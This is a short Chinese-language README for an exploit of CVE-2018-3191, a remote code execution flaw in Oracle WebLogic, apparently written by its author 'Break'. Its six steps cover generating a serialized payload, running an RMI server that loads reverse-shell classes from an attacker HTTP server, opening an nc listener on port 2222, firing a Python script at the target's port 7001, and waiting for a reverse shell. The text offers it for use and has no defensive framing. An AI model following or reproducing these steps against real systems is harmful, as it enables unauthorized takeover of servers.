CVE-2018-3191-Rce-Exploit
作者:Break
第一步:java -jar GenPayload.java output SJpayload.bin,地址为RMI服务器地址
第二步:java -jar RMISERVER.jar httpaddress,RMI服务器监听端口1099并在Web服务器上加载远程反向类
第三步:将两个文件(反向shell) LoadObject.class 和 StreamConnection.class 放在HTTP服务器上,并能通过URL访问
第四步:nc -llp 2222
第五步:python weblogic.py weblogicAddress 7001 SJpayload
第六步:等待反向shell,祝你好运